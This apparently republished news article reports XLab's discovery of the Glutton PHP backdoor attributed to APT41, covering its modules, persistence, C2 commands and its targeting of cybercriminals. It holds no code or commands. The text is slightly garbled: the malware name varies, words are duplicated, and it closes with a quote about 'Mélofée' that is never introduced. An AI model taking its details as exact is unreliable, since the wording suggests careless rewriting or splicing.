Cybersecurity researchers have discovered a new PHP-based backdoor named Gluttony which has been used in cyberattacks against China, the United States, Cambodia, Pakistan, and South Africa.
QiAnXin XLab, which discovered the malware in late April 2024, attributed the previously unknown malware to the prolific Chinese state-owned group Winnti (aka APT41) with moderate confidence.
“Interestingly, our investigation revealed that the creators of Glutton deliberately targeted systems in the cybercrime market,” the company said in a statement. said. “With poisoning operations, they sought to turn cybercriminals’ tools against themselves — a classic ‘no honor among thieves’ scenario.”
Glutton is designed to collect sensitive system information, remove ELF backdoor components, and inject code into popular PHP frameworks such as Baota (BT), ThinkPHP, Yii, and Laravel. The ELF malware also bears “almost complete similarity” to the well-known Winnti tool known as PWNLNX.
Despite the links to Winnti, XLab said it could not definitively link the backdoor to an adversary due to the lack of stealth techniques commonly associated with the group. The cybersecurity company called the flaws “uncharacteristic.”
This includes the absence of encrypted command-and-control (C2) communications, the use of HTTP (instead of HTTPS) to download payloads, and the fact that the samples are free of any obfuscation.
Essentially, Glutton is a modular malware system capable of infecting PHP files on target devices as well as installing backdoors. Initial access is believed to be achieved by exploiting zero-day and N-day flaws and brute force attacks.
Another unconventional approach involves advertising on cybercrime forums compromised enterprise hosts that contain l0ader_shell, a backdoor injected into PHP files, effectively allowing operators to launch attacks against other cybercriminals.
The main module that provides the attack is “task_loader”, which is used to evaluate the runtime environment and retrieve additional components, including “init_task”, which is responsible for loading an ELF-based backdoor that is masquerading as FastCGI Process Manager (“/lib/php-fpm”), infecting PHP files with malicious code to further execute the payload, as well as collecting sensitive information and modifying system files.
The attack chain also includes a module called “client_loader”, a reengineered version of “init_task” that uses an updated network infrastructure and includes the ability to download and run a backdoor client. It modifies system files like “/etc/init.d/network” to set persistence.
The PHP backdoor is a full-featured backdoor that supports 22 unique commands that allow you to switch C2 connections between TCP and UDP, run a shell, download/upload files, perform file and directory operations, and run arbitrary PHP code. In addition, the framework allows more PHP payloads to be fetched and run by periodically polling the C2 server.
“These payloads are highly modular, able to function independently or be executed sequentially through a task_loader to form a complex attack framework,” XLab said. “All code execution takes place in PHP or PHP-FPM (FastCGI) processes, ensuring that no file payloads are left behind, thus achieving a hidden footprint.”
Another notable aspect is usage HackBrowserData a tool in systems used by cybercriminal operators to steal sensitive information for the possible purpose of informing future phishing or social engineering campaigns.
“In addition to targeting traditional white hat victims through cybercrime, Glutton demonstrates a strategic focus on exploiting cybercrime resource operators,” XLab said. “This creates a recursive chain of attacks, leveraging the attackers’ own activities against them.”
The disclosure comes weeks after XLab detailed an updated version of the APT41 malware called Clefairy which adds improved storage mechanisms and “embeds an RC4-encrypted kernel driver to mask traces of files, processes, and network connections.”
Once installed, the Linux backdoor is equipped to communicate with the C2 server to receive and execute a variety of commands, including gathering device and process information, running a shell, managing processes, performing file and directory operations, and self-removal.
“Mélofée offers simple functionality with very effective stealth capabilities,” it said said. “Examples of this malware family are rare, suggesting that attackers may limit its use to high-value targets.”
